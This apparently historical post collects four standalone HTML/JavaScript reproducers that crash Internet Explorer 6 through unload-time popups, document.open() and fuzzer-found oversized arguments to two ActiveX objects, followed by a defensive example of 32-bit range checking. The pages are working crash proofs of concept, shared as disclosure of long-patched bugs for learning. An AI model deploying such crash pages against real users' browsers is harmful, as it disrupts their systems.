A collection of four separate crash cases, found around the same time. Each one is a standalone reproducer.

AbortUnloadFromCreatePopUp (IE6 only)

An access violation in ShowHTMLDialog occurs when navigating away from a page that creates a popup during the unload event and sets parent.location.href from within that popup’s onunload:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Cover Desktop</title></head>
<body>
<font face="Tahoma" size="2">
<b> IE6 </b>
Crash: Access Violation in the ShowHTMLDialog (mshtml) function after you <a href="http://www.google.com/">move away</a> from this URL.
</font>

<script language="JavaScript">
function startPopUp(){
	var oPopup = window.createPopup();
	oPopup.document.body.innerHTML = '.<script defer="defer">window.onunload=function (){parent.location.href=""}<\/script>';
	oPopup.show(0, 0, 1000, 1000);
}
onbeforeunload = onunload = startPopUp;
</script>

</body>
</html>

DocumentOpen_AccessOpener

Calling document.open() to get a new document object, storing it in top.opener, and then accessing top.opener from a newly written script crashes the browser:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Crash when accessing the opened document</title></head>
<body>
<script language="JavaScript">

top.opener=document.open("text/html", "replace");

//When accessing the top.opener, it crashes.
document.write('<script>a=top.opener;<\/script>');
document.close();

</script>
</body>
</html>

FolderItem_InvokeVerbEx (IE6 only)

Found with the axMan fuzzer. Calling InvokeVerbEx on the FolderItem ActiveX object with out-of-range integer values crashes IE6:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Crash when calling the InvokeVerbEx in the FolderItem</title></head>
<body>
I didn't find this bug: I simply loaded the axMan Fuzzer and that script found it.

<object id="folderItem" classid="clsid:FEF10FA2-355E-4e06-9381-9B24D7F7CC88"></object>

<script language="JavaScript">

folderItem.InvokeVerbEx(4294967296, 4294967296);

</script>

</body>
</html>

FolderItems3_Filter (IE6 only)

Also found with axMan. Calling Filter on the FolderItems3 ActiveX object with large integer values crashes IE6:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Crash when calling the Filter in the FolderItems3</title></head>
<body>
I didn't find this bug: I simply loaded the axMan Fuzzer and that script found it.

<object id="folderItem3" classid="clsid:53C74826-AB99-4d33-ACA4-3117F51D3788"></object>

<script language="JavaScript">
folderItem3.Filter(2147483647, 4294967296);
</script>

</body>
</html>

The last two were discovered through automated fuzzing rather than manual exploration. Passing 4294967296 (2^32) to methods that expect 32-bit integers causes integer overflow or type confusion in the parameter handling code.
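
The following is an added example, not code from the original post or from Internet Explorer: it takes the argument values used in the two reproducers and shows what a silent 32-bit truncation does to them, next to a strict range check that a binding layer can apply instead. The function names are hypothetical, and the page does not show how the affected methods actually converted their parameters.

```javascript
// Added illustration; all function names here are hypothetical.
const INT32_MIN = -2147483648; // -(2^31)
const INT32_MAX = 2147483647;  // 2^31 - 1

// Silent truncation: ECMAScript ToInt32 / ToUint32 keep only the low 32 bits.
function truncateToInt32(n) { return n | 0; }
function truncateToUint32(n) { return n >>> 0; }

// Strict check: accept only integers that fit a signed 32-bit parameter.
function checkInt32(name, value) {
  if (typeof value !== "number" || !Number.isInteger(value)) {
    return { ok: false, reason: name + ": not an integer" };
  }
  if (value < INT32_MIN || value > INT32_MAX) {
    return { ok: false, reason: name + ": " + value + " is outside the signed 32-bit range" };
  }
  return { ok: true, value: value };
}

// Hypothetical guard in front of a native method declared with two 32-bit parameters.
function guardedCall(nativeFn, a, b) {
  const failed = [checkInt32("arg0", a), checkInt32("arg1", b)].filter(c => !c.ok);
  if (failed.length > 0) {
    throw new RangeError(failed.map(c => c.reason).join("; "));
  }
  return nativeFn(a, b);
}

// Argument pairs as they appear in the two reproducers above.
const PAGE_ARGS = [[4294967296, 4294967296], [2147483647, 4294967296]];

// For each argument: the truncated forms and whether the strict check accepts it.
function describe(pairs) {
  return pairs.map(pair => pair.map(v => ({
    value: v,
    int32: truncateToInt32(v),
    uint32: truncateToUint32(v),
    accepted: checkInt32("arg", v).ok,
  })));
}

console.log(JSON.stringify(describe(PAGE_ARGS), null, 2));
```

Truncation turns 4294967296 into 0 without any error, so the callee sees a value the caller never wrote; the strict check rejects it before the call is made.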

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.